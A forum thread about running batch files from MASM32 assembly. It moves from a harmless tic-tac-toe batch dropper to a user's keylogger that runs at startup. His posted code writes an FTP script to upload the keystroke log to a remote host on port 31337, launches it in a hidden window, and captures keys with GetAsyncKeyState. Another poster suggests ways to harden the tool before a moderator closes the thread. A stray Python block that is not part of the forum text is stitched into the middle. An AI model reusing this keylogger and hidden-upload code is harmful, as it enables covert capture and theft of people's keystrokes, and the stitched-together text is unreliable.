Running commandline instructions?

Started by brixton, May 23, 2005, 10:08:11 PM

brixton

Hey all,

I am a newbie at w32asm.  I just wondered if there was a quick way of running a commandline instruction such as echo or something from an assembly app.  I plan to have no GUI, so it shouldn't require any input.

Any help appreciated!   :U
If you love somebody, set them free.
If they return, they were always yours. If they don't, they never were..


brixton

Many thanks. Just one query: can I create a batch file using standard APIs and then execute that with the WinExec API?  Would that work?  I wonder because this would suit my needs better, and is also easier  :U

pbrennick

brixton,
Sorry, not in the way you would like.  However, you could probably write a program that would accept and process such a command as a commandline tail.  The problem, though, is that most APIs require support such as structures, variables and buffers which would make them impossible to do.  So, even though it can work in concept, it is not feasible.

What, exactly, are you trying to do?  Or are you just exploring different types of functionalities?

Paul

Mirno

You can create a batch-file dropper like this:

.386
.model flat,stdcall
option casemap:none

.nolist
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
.list

.data
someData db 64,69,67,72,79,32,79,70,70,13,10,13,10,83,69,84
         db 32,65,61,49,13,10,83,69,84,32,66,61,50,13,10,83
         db 69,84,32,67,61,51,13,10,13,10,83,69,84,32,68,61
         db 52,13,10,83,69,84,32,69,61,53,13,10,83,69,84,32
         db 70,61,54,13,10,13,10,83,69,84,32,71,61,55,13,10
         db 83,69,84,32,72,61,56,13,10,83,69,84,32,73,61,57
         db 13,10,13,10,83,69,84,32,47,80,32,80,76,65,89,69
         db 82,49,61,34,69,110,116,101,114,32,121,111,117,114,32,110
         db 97,109,101,32,112,108,97,121,101,114,32,88,58,32,34,13
         db 10,83,69,84,32,47,80,32,80,76,65,89,69,82,50,61
         db 34,69,110,116,101,114,32,121,111,117,114,32,110,97,109,101
         db 32,112,108,97,121,101,114,32,79,58,32,34,13,10,13,10
         db 83,69,84,32,67,117,114,114,101,110,116,80,108,97,121,101
         db 114,61,79,13,10,83,69,84,32,84,117,114,110,61,48,13
         db 10,83,69,84,32,87,105,110,110,101,114,61,48,13,10,13
         db 10,58,83,116,97,114,116,76,111,111,112,13,10,73,70,32
         db 34,37,67,117,114,114,101,110,116,80,108,97,121,101,114,37
         db 34,61,61,34,79,34,32,40,13,10,32,32,83,69,84,32
         db 67,117,114,114,101,110,116,80,108,97,121,101,114,61,88,13
         db 10,41,32,69,76,83,69,32,40,13,10,32,32,83,69,84
         db 32,67,117,114,114,101,110,116,80,108,97,121,101,114,61,79
         db 13,10,41,13,10,13,10,67,65,76,76,32,58,80,114,105
         db 110,116,66,111,97,114,100,13,10,13,10,58,71,101,116,67
         db 109,100,13,10,67,65,76,76,32,58,71,101,116,67,111,109
         db 109,97,110,100,32,37,67,117,114,114,101,110,116,80,108,97
         db 121,101,114,37,13,10,73,70,32,34,37,69,82,82,79,82
         db 76,69,86,69,76,37,34,61,61,34,49,34,32,40,13,10
         db 32,32,69,67,72,79,32,66,97,100,32,105,110,112,117,116
         db 44,32,112,108,101,97,115,101,32,116,114,121,32,97,103,97
         db 105,110,13,10,32,32,71,79,84,79,32,58,71,101,116,67
         db 109,100,13,10,41,13,10,13,10,67,65,76,76,32,58,67
         db 104,101,99,107,87,105,110,110,101,114,32,37,67,117,114,114
         db 101,110,116,80,108,97,121,101,114,37,13,10,73,70,32,34
         db 37,87,105,110,110,101,114,37,34,61,61,34,49,34,32,40
         db 13,10,32,32,80,65,85,83,69,13,10,32,32,71,79,84
         db 79,32,58,69,79,70,13,10,41,13,10,13,10,83,69,84
         db 32,47,65,32,84,117,114,110,61,37,84,117,114,110,37,32
         db 43,32,49,13,10,73,70,32,78,79,84,32,34,37,84,117
         db 114,110,37,34,32,61,61,32,34,57,34,32,71,79,84,79
         db 32,58,83,116,97,114,116,76,111,111,112,13,10,13,10,67
         db 65,76,76,32,58,80,114,105,110,116,66,111,97,114,100,13
         db 10,69,99,104,111,32,73,116,32,119,97,115,32,97,32,100
         db 114,97,119,33,13,10,80,65,85,83,69,13,10,71,79,84
         db 79,32,58,69,79,70,13,10,13,10,58,80,114,105,110,116
         db 66,111,97,114,100,13,10,83,69,84,32,69,82,82,79,82
         db 76,69,86,69,76,61,48,13,10,67,76,83,13,10,13,10
         db 69,67,72,79,32,32,37,65,37,32,73,32,37,66,37,32
         db 73,32,37,67,37,13,10,69,67,72,79,32,45,45,45,43
         db 45,45,45,43,45,45,45,13,10,69,67,72,79,32,32,37
         db 68,37,32,73,32,37,69,37,32,73,32,37,70,37,13,10
         db 69,67,72,79,32,45,45,45,43,45,45,45,43,45,45,45
         db 13,10,69,67,72,79,32,32,37,71,37,32,73,32,37,72
         db 37,32,73,32,37,73,37,13,10,71,79,84,79,32,58,69
         db 79,70,13,10,13,10,58,71,101,116,67,111,109,109,97,110
         db 100,13,10,73,70,32,34,37,49,37,34,61,61,34,88,34
         db 32,40,13,10,32,32,83,69,84,32,84,83,84,82,73,78
         db 71,61,37,80,76,65,89,69,82,49,37,39,115,32,109,111
         db 118,101,58,32,13,10,41,13,10,13,10,73,70,32,34,37
         db 49,37,34,61,61,34,79,34,32,40,13,10,32,32,83,69
         db 84,32,84,83,84,82,73,78,71,61,37,80,76,65,89,69
         db 82,50,37,39,115,32,109,111,118,101,58,32,13,10,41,13
         db 10,13,10,83,69,84,32,47,80,32,79,80,69,82,65,84
         db 73,79,78,61,37,84,83,84,82,73,78,71,37,13,10,13
         db 10,83,69,84,32,69,82,82,79,82,76,69,86,69,76,61
         db 49,13,10,13,10,73,70,32,34,37,79,80,69,82,65,84
         db 73,79,78,37,34,61,61,34,49,34,32,73,70,32,34,37
         db 65,37,34,61,61,34,49,34,32,40,13,10,32,32,83,69
         db 84,32,65,61,37,49,37,13,10,32,32,83,69,84,32,69
         db 82,82,79,82,76,69,86,69,76,61,48,13,10,41,13,10
         db 73,70,32,34,37,79,80,69,82,65,84,73,79,78,37,34
         db 61,61,34,50,34,32,73,70,32,34,37,66,37,34,61,61
         db 34,50,34,32,40,13,10,32,32,83,69,84,32,66,61,37
         db 49,37,13,10,32,32,83,69,84,32,69,82,82,79,82,76
         db 69,86,69,76,61,48,13,10,41,13,10,73,70,32,34,37
         db 79,80,69,82,65,84,73,79,78,37,34,61,61,34,51,34
         db 32,73,70,32,34,37,67,37,34,61,61,34,51,34,32,40
         db 13,10,32,32,83,69,84,32,67,61,37,49,37,13,10,32
         db 32,83,69,84,32,69,82,82,79,82,76,69,86,69,76,61
         db 48,13,10,41,13,10,13,10,73,70,32,34,37,79,80,69
         db 82,65,84,73,79,78,37,34,61,61,34,52,34,32,73,70
         db 32,34,37,68,37,34,61,61,34,52,34,32,40,13,10,32
         db 32,83,69,84,32,68,61,37,49,37,13,10,32,32,83,69
         db 84,32,69,82,82,79,82,76,69,86,69,76,61,48,13,10
         db 41,13,10,73,70,32,34,37,79,80,69,82,65,84,73,79
         db 78,37,34,61,61,34,53,34,32,73,70,32,34,37,69,37
         db 34,61,61,34,53,34,32,40,13,10,32,32,83,69,84,32
         db 69,61,37,49,37,13,10,32,32,83,69,84,32,69,82,82
         db 79,82,76,69,86,69,76,61,48,13,10,41,13,10,73,70
         db 32,34,37,79,80,69,82,65,84,73,79,78,37,34,61,61
         db 34,54,34,32,73,70,32,34,37,70,37,34,61,61,34,54
         db 34,32,40,13,10,32,32,83,69,84,32,70,61,37,49,37
         db 13,10,32,32,83,69,84,32,69,82,82,79,82,76,69,86
         db 69,76,61,48,13,10,41,13,10,13,10,73,70,32,34,37
         db 79,80,69,82,65,84,73,79,78,37,34,61,61,34,55,34
         db 32,73,70,32,34,37,71,37,34,61,61,34,55,34,32,40
         db 13,10,32,32,83,69,84,32,71,61,37,49,37,13,10,32
         db 32,83,69,84,32,69,82,82,79,82,76,69,86,69,76,61
         db 48,13,10,41,13,10,73,70,32,34,37,79,80,69,82,65
         db 84,73,79,78,37,34,61,61,34,56,34,32,73,70,32,34
         db 37,72,37,34,61,61,34,56,34,32,40,13,10,32,32,83
         db 69,84,32,72,61,37,49,37,13,10,32,32,83,69,84,32
         db 69,82,82,79,82,76,69,86,69,76,61,48,13,10,41,13
         db 10,73,70,32,34,37,79,80,69,82,65,84,73,79,78,37
         db 34,61,61,34,57,34,32,73,70,32,34,37,73,37,34,61
         db 61,34,57,34,32,40,13,10,32,32,83,69,84,32,73,61
         db 37,49,37,13,10,32,32,83,69,84,32,69,82,82,79,82
         db 76,69,86,69,76,61,48,13,10,41,13,10,13,10,71,79
         db 84,79,32,58,69,79,70,13,10,13,10,58,67,104,101,99
         db 107,87,105,110,110,101,114,13,10,73,70,32,34,37,49,37
         db 34,61,61,34,88,34,32,40,13,10,32,32,83,69,84,32
         db 84,83,84,82,73,78,71,61,37,80,76,65,89,69,82,49
         db 37,32,119,105,110,115,33,32,13,10,41,13,10,13,10,73
         db 70,32,34,37,49,37,34,61,61,34,79,34,32,40,13,10
         db 32,32,83,69,84,32,84,83,84,82,73,78,71,61,37,80
         db 76,65,89,69,82,50,37,32,119,105,110,115,33,32,13,10
         db 41,13,10,13,10,73,70,32,34,37,65,37,34,61,61,34
         db 37,49,37,34,32,40,13,10,32,32,73,70,32,34,37,66
         db 37,34,61,61,34,37,49,37,34,32,40,13,10,32,32,32
         db 32,73,70,32,34,37,67,37,34,61,61,34,37,49,37,34
         db 32,40,13,10,32,32,32,32,32,32,67,65,76,76,32,58
         db 80,114,105,110,116,66,111,97,114,100,13,10,32,32,32,32
         db 32,32,69,67,72,79,32,37,84,83,84,82,73,78,71,37
         db 13,10,32,32,32,32,32,32,83,69,84,32,87,105,110,110
         db 101,114,61,49,13,10,32,32,32,32,41,13,10,32,32,41
         db 13,10,13,10,32,32,73,70,32,34,37,68,37,34,61,61
         db 34,37,49,37,34,32,40,13,10,32,32,32,32,73,70,32
         db 34,37,71,37,34,61,61,34,37,49,37,34,32,40,13,10
         db 32,32,32,32,32,32,67,65,76,76,32,58,80,114,105,110
         db 116,66,111,97,114,100,13,10,32,32,32,32,32,32,69,67
         db 72,79,32,37,84,83,84,82,73,78,71,37,13,10,32,32
         db 32,32,32,32,83,69,84,32,87,105,110,110,101,114,61,49
         db 13,10,32,32,32,32,41,13,10,32,32,41,13,10,13,10
         db 32,32,73,70,32,34,37,69,37,34,61,61,34,37,49,37
         db 34,32,40,13,10,32,32,32,32,73,70,32,34,37,73,37
         db 34,61,61,34,37,49,37,34,32,40,13,10,32,32,32,32
         db 32,32,67,65,76,76,32,58,80,114,105,110,116,66,111,97
         db 114,100,13,10,32,32,32,32,32,32,69,67,72,79,32,37
         db 84,83,84,82,73,78,71,37,13,10,32,32,32,32,32,32
         db 83,69,84,32,87,105,110,110,101,114,61,49,13,10,32,32
         db 32,32,41,13,10,32,32,41,13,10,41,13,10,13,10,73
         db 70,32,34,37,66,37,34,61,61,34,37,49,37,34,32,40
         db 13,10,32,32,73,70,32,34,37,69,37,34,61,61,34,37
         db 49,37,34,32,40,13,10,32,32,32,32,73,70,32,34,37
         db 72,37,34,61,61,34,37,49,37,34,32,40,13,10,32,32
         db 32,32,32,32,67,65,76,76,32,58,80,114,105,110,116,66
         db 111,97,114,100,13,10,32,32,32,32,32,32,69,67,72,79
         db 32,37,84,83,84,82,73,78,71,37,13,10,32,32,32,32
         db 32,32,83,69,84,32,87,105,110,110,101,114,61,49,13,10
         db 32,32,32,32,41,13,10,32,32,41,13,10,41,13,10,13
         db 10,73,70,32,34,37,67,37,34,61,61,34,37,49,37,34
         db 32,40,13,10,32,32,73,70,32,34,37,70,37,34,61,61
         db 34,37,49,37,34,32,40,13,10,32,32,32,32,73,70,32
         db 34,37,73,37,34,61,61,34,37,49,37,34,32,40,13,10
         db 32,32,32,32,32,32,67,65,76,76,32,58,80,114,105,110
         db 116,66,111,97,114,100,13,10,32,32,32,32,32,32,69,67
         db 72,79,32,37,84,83,84,82,73,78,71,37,13,10,32,32
         db 32,32,32,32,83,69,84,32,87,105,110,110,101,114,61,49
         db 13,10,32,32,32,32,41,13,10,32,32,41,13,10,13,10
         db 32,32,73,70,32,34,37,69,37,34,61,61,34,37,49,37
         db 34,32,40,13,10,32,32,32,32,73,70,32,34,37,71,37
         db 34,61,61,34,37,49,37,34,32,40,13,10,32,32,32,32
         db 32,32,67,65,76,76,32,58,80,114,105,110,116,66,111,97
         db 114,100,13,10,32,32,32,32,32,32,69,67,72,79,32,37
         db 84,83,84,82,73,78,71,37,13,10,32,32,32,32,32,32
         db 83,69,84,32,87,105,110,110,101,114,61,49,13,10,32,32
         db 32,32,41,13,10,32,32,41,13,10,41,13,10,13,10,73
         db 70,32,34,37,68,37,34,61,61,34,37,49,37,34,32,40
         db 13,10,32,32,73,70,32,34,37,69,37,34,61,61,34,37
         db 49,37,34,32,40,13,10,32,32,32,32,73,70,32,34,37
         db 70,37,34,61,61,34,37,49,37,34,32,40,13,10,32,32
         db 32,32,32,32,67,65,76,76,32,58,80,114,105,110,116,66
         db 111,97,114,100,13,10,32,32,32,32,32,32,69,67,72,79
         db 32,37,84,83,84,82,73,78,71,37,13,10,32,32,32,32
         db 32,32,83,69,84,32,87,105,110,110,101,114,61,49,13,10
         db 32,32,32,32,41,13,10,32,32,41,13,10,41,13,10,13
         db 10,73,70,32,34,37,71,37,34,61,61,34,37,49,37,34
         db 32,40,13,10,32,32,73,70,32,34,37,72,37,34,61,61
         db 34,37,49,37,34,32,40,13,10,32,32,32,32,73,70,32
         db 34,37,73,37,34,61,61,34,37,49,37,34,32,40,13,10
         db 32,32,32,32,32,32,67,65,76,76,32,58,80,114,105,110
         db 116,66,111,97,114,100,13,10,32,32,32,32,32,32,69,67
         db 72,79,32,37,84,83,84,82,73,78,71,37,13,10,32,32
         db 32,32,32,32,83,69,84,32,87,105,110,110,101,114,61,49
         db 13,10,32,32,32,32,41,13,10,32,32,41,13,10,41,13
         db 10,71,79,84,79,32,58,69,79,70,13,10

dataLen  EQU $-someData

tgtName db "OnXfile.bat", 0
hBat    dd 0
tmp     dd 0

.code
start:
    invoke CreateFile, ADDR tgtName, GENERIC_WRITE, 0, NULL, CREATE_NEW, NULL, NULL
    mov hBat, eax

    invoke WriteFile, eax, ADDR someData, dataLen, ADDR tmp, NULL
    invoke FlushFileBuffers, hBat
    invoke CloseHandle, hBat

    invoke WinExec, ADDR tgtName, SW_SHOWNORMAL

    invoke ExitProcess, 0
end start


The data is created using \masm32\bintodb.exe on the batch file.

Mirno
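The bintodb step Mirno mentions, and its inverse, as an added example in Python (not code from the thread or from the MASM32 package): encoding a file into `db` lines the way bintodb lays them out, and decoding a `db` block back into the script it embeds, which is the check a reviewer would run on a dropper like the one above before trusting it. The function names and the sample batch text are my own.

```python
"""Round trip between raw bytes and MASM `db` data lines.

Added example, not code from the thread or from the MASM32 package: a
bintodb-style encoder (bytes -> `db` lines, 16 values per line) plus the
inverse decoder, so a reviewer can recover the script that a dropper like
Mirno's embeds from its `db` block alone. Function names are my own.
"""
import re

# Matches `label db <values>` or an indented continuation `db <values>`.
_DB_LINE = re.compile(r"^\s*(?:\w+\s+)?db\s+(.*)$", re.IGNORECASE)


def bintodb(data: bytes, name: str = "someData", per_line: int = 16) -> str:
    """Encode `data` as decimal `db` lines in the layout bintodb produces.

    The first line carries the label; continuation lines are indented by
    the label width so the values line up, and a `dataLen` EQU follows.
    """
    lines = []
    pad = " " * (len(name) + 1)
    for off in range(0, len(data), per_line):
        chunk = ",".join(str(b) for b in data[off:off + per_line])
        prefix = name + " " if off == 0 else pad
        lines.append(f"{prefix}db {chunk}")
    lines.append("")
    lines.append(f"dataLen  EQU $-{name}")
    return "\n".join(lines)


def db_to_bytes(asm_text: str) -> bytes:
    """Decode the first run of numeric `db` lines in `asm_text` to bytes.

    Decoding stops at the first non-`db` line after the run starts (the
    blank line or the EQU in the thread's listing). Decimal and `..h` hex
    literals are handled; quoted strings are not, as bintodb emits none.
    """
    out = bytearray()
    started = False
    for line in asm_text.splitlines():
        m = _DB_LINE.match(line)
        if not m:
            if started:
                break
            continue
        started = True
        values = m.group(1).split(";")[0]  # drop a trailing comment
        for tok in values.split(","):
            tok = tok.strip()
            if not tok:
                continue
            out.append(int(tok[:-1], 16) if tok.lower().endswith("h") else int(tok))
    return bytes(out)


# Constructed sample: a tiny batch script, not the thread's game.
SAMPLE_BAT = b"@ECHO OFF\r\nECHO Dropped by the example\r\nPAUSE\r\n"

if __name__ == "__main__":
    asm = bintodb(SAMPLE_BAT)
    print(asm)
    print(db_to_bytes(asm).decode("ascii"))
```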

Phil

mirno: Now there's a batch file that everyone should have! Not a bad game of 'noughts and crosses' too!

Thanks for the pointer to the masm bintodb program! Hadn't seen that before.



hutch--

I second the idea, the Mirno "noughts and crosses" should be enshrined in the hall of fame!

Here is an alternative method if you are not using characters that MASM reserves for special uses in macros.


; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
    include \masm32\include\masm32rt.inc
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

comment * -----------------------------------------------------
                        Build this  template with
                       "CONSOLE ASSEMBLE AND LINK"
        ----------------------------------------------------- *

    .code

start:
   
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

    call main

    exit

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

main proc

    LOCAL hFile :DWORD

    mov hFile, fcreate("testme.bat")

    fprint hFile,"@echo off"
    fprint hFile,"cd \"
    fprint hFile,"dir /b"

    fclose hFile

    fn WinExec,"testme.bat",1

    ret

main endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

end start
Download site for MASM32      New MASM Forum
https://masm32.com          https://masm32.com/board/index.php

brixton

Hello all,

Many thanks for all the replies.  However, hutch-- has given me exactly what I wanted, many thanks!

If you are interested in my reason for wanting this functionality, it's because I am creating a keylogger (for innocent purposes) which, when executed (on startup), uploads its log file to my website so I can access it anywhere.

One final question, with WinExec, can I specify commandline switches?

hutch--

You should have no problems passing command line parameters to WinExec().

Mark Jones

Perhaps consider using HTTPS or some sort of encryption algorithm on your transmitted data so it can't be intercepted by packet sniffers and the like. Without any security a cracker could easily compromise this code for much more sinister purposes (with your name on it!). Even with security it's only a matter of time. ::) Even businesses behind corporate firewalls are not entirely safe - I've seen a number of businesses be hacked when they thought they were bulletproof.

How about a series of routines embedded in various parts of the code which run randomly and check your server for a good hash value based on the GMT date? If no server is found after x days or the routines are modified, the app stops working? That might at least slow them down a little. :)
"To deny our impulses... foolish; to revel in them, chaos." MCJ 2003.08

Vortex

Quote from: brixton on May 28, 2005, 12:43:40 AM
One final question, with WinExec, can I specify commandline switches?

Hi brixton,

Here is an example for you:


.386
.model flat,stdcall
option casemap:none

include     \masm32\include\windows.inc
include     \masm32\include\kernel32.inc
includelib  \masm32\lib\kernel32.lib

.data
filename    db 'test.exe WinExec example',0 ; test.exe
                                            ; with two cmdline params
.code
start:
    invoke  WinExec,ADDR filename,SW_SHOW
    invoke  ExitProcess,0
END start

[attachment deleted by admin]

brixton

Thank you for the replies.

I'm not particularly bothered by this security business.  The upload is taking place off one of my computers, using an ftp account which has a default dir on my website.  It doesn't have many permissions, and can't be used for anything other than WRITE, APPEND and DELETE (and there's nothing but this log in the folder).

I am using this kind of format:

.data

uploadcommand db "ftp -s:ul.cfg", 0
configfile db "ul.cfg", 0
configline1 db "open 0.0.0.0 31337", 13, 10
configline2 db "misc", 13, 10
configline4 db "put log.txt", 13, 10
configline5 db "bye", 0
confighandle dd 0

.code

invoke _lcreat, ADDR configfile, 0
mov confighandle, eax
invoke _lwrite, confighandle, ADDR configline1, 19
invoke _lwrite, confighandle, ADDR configline2, 13
invoke _lwrite, confighandle, ADDR configline2, 13
invoke _lwrite, confighandle, ADDR configline4, 13
invoke _lwrite, confighandle, ADDR configline5, 3
invoke _lclose, confighandle
invoke WinExec, ADDR uploadcommand, SW_HIDE


Will program execution pause at the WinExec command (basically until the log file is uploaded)?  Because I have actually created my program and the upload works successfully, but I'm still unsure about that.

Btw, is there an easy way to detect whether a key (non-system) has been pressed?  Atm I have very messy code using

@@:

invoke GetAsyncKeyState, (hexcode)h
cmp al, 1
jne @F
invoke _lwrite, filehandle, ADDR (hexcode)press, length


.. And so on for each key I want to log.

Although this method works, it's lengthy and poorly coded.  Any help is appreciated!

Mark Jones

Quote
configline1 db "open 0.0.0.0 31337", 13, 10

Interesting port.

sluggy

That was a very interesting choice of ports.
Due to the nature of this thread, and the dubious uses for a keylogger, and the fact that log files are being uploaded to an ftp server, and the fact that we have no guarantee that brixton will not deploy this beyond his own machine, I think it is time to close this thread.

brixton,
if you can supply a decent reason why this thread should be kept open, then it will be reopened. Otherwise please desist from asking questions of this nature.